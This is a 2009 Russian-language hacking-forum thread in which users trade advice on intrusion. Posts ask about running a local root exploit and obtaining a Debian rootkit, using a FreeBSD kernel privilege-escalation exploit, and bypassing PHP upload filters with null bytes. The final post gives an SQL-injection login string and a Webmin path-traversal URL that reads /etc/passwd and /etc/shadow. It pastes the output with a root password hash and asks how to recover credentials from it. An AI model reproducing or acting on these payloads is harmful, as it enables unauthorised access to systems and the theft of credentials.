HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 31.10.2009, 13:33
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами: 9520453

Репутация: 124
По умолчанию

Цитата:
Сообщение от LokbatanLi  
Gorev, nu pocti ti menya i ya tebya ponel kak blind sql budet??
Blind-injection рассмотрена в статье, ссылку на которую я давал несколькими постами выше.
 
Ответить с цитированием

  #2  
Старый 31.10.2009, 14:53
p.r0phe.t
Познающий
Регистрация: 22.08.2009
Сообщений: 98
С нами: 8799871

Репутация: 19
По умолчанию

Подскажите,запускаю локал рут сплойт на шеле пишет
No job control on this shell
Система Debian Linux yesclub 2.6.18-6-686. Cплойт собран на OpenSuse 11,причём её он с радостью порутал =)
В чём трабла?
P.s. я понимаю,что не хочет работать на этом шеле,вопрос почему?
P.S.S. Уффф,порутал. =)
Зыыы Посоветуйте свежий паблик (можно и не паблик =)) руткит под Linx Debian с сцылкой желательно и выложите,если у кого есть, ваниш собранный,никак не хочет компилиься. =( С меня репа =)

Последний раз редактировалось p.r0phe.t; 31.10.2009 в 16:10..
 
Ответить с цитированием

  #3  
Старый 31.10.2009, 17:28
bons
Участник форума
Регистрация: 20.12.2007
Сообщений: 295
С нами: 9679872

Репутация: 347
По умолчанию

кто либо пользовался этим эксплойтом http://milw0rm.com/exploits/7581 ?
(FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit)
написано запускать так: usage: ./x <allproc>\n
что за параметр allproc?
 
Ответить с цитированием

  #4  
Старый 31.10.2009, 17:55
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами: 8947056

Репутация: 229
По умолчанию

Null байт не действует при аплоаде в систему виндувс? (php)

Последний раз редактировалось wolmer; 31.10.2009 в 18:04..
 
Ответить с цитированием

  #5  
Старый 31.10.2009, 20:24
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
С нами: 10109126

Репутация: 1980
По умолчанию

В функциях copy() и move_uploaded_file() null-байт работает, если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN:
Цитата:
On Windows OS move_uploaded_file function will convert "foo.php"
followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\)
back to "foo.php"
 
Ответить с цитированием

  #6  
Старый 01.11.2009, 09:45
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами: 8947056

Репутация: 229
По умолчанию

Цитата:
Сообщение от [Raz0r]  
если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN
Можно поподробней о этом? (+ с примером если можно)
milw0rm.com/papers/359 - не знаю англ язык

(strtolower не должен влиять на Null байт по идее?)

Последний раз редактировалось wolmer; 01.11.2009 в 10:04..
 
Ответить с цитированием

  #7  
Старый 01.11.2009, 10:19
keng
Познающий
Регистрация: 09.04.2008
Сообщений: 79
С нами: 9520453

Репутация: 124
По умолчанию

Цитата:
Сообщение от wolmer  
Можно поподробней о этом? (+ с примером если можно)
milw0rm.com/papers/359 - не знаю англ язык

(strtolower не должен влиять на Null байт по идее?)
Почитай данную статью . =)
 
Ответить с цитированием

  #8  
Старый 01.11.2009, 11:02
wolmer
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
С нами: 8947056

Репутация: 229
По умолчанию

Цитата:
Сообщение от keng  
Почитай данную статью . =)
Что-то не получается заюзать (с точкой), нужен пример с POST'ом
 
Ответить с цитированием

  #9  
Старый 01.11.2009, 13:42
L I G A
Постоянный
Регистрация: 27.07.2008
Сообщений: 614
С нами: 9362947

Репутация: 1196


По умолчанию

Цитата:
Сообщение от wolmer  
(strtolower не должен влиять на Null байт по идее?)
а самому подумать?
в %00 - нет буквенных символов , чтоб переводить в нижний регистр
 
Ответить с цитированием

  #10  
Старый 31.10.2009, 22:02
DrakonSerg
Познающий
Регистрация: 16.04.2009
Сообщений: 81
С нами: 8984365

Репутация: 45
По умолчанию

Не знаю, тут ли постю. Если что - прошу прощения. Ранее получал доступ в админку по линку http://192.168.0.1. В логин или пароль (1' or 1=1/*) и получил права. Спалили, поменяли. Поставил админ WEBMIN. Приконектився к 10000 порту. Скуль не проходит. Нарыл такую вот штуку
PHP код:
http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd 
показывает это (урывок): root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

И такую:
PHP код:
http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow 
Показывает такое (урывок):
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
bin:*:14346:0:99999:7:::
daemon:*:14346:0:99999:7:::
adm:*:14346:0:99999:7:::
lp:*:14346:0:99999:7:::
sync:*:14346:0:99999:7:::
shutdown:*:14346:0:99999:7:::
halt:*:14346:0:99999:7:::
mail:*:14346:0:99999:7:::
news:*:14346:0:99999:7:::
uucp:*:14346:0:99999:7:::

Можно логин-пароль найти в этих данных?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.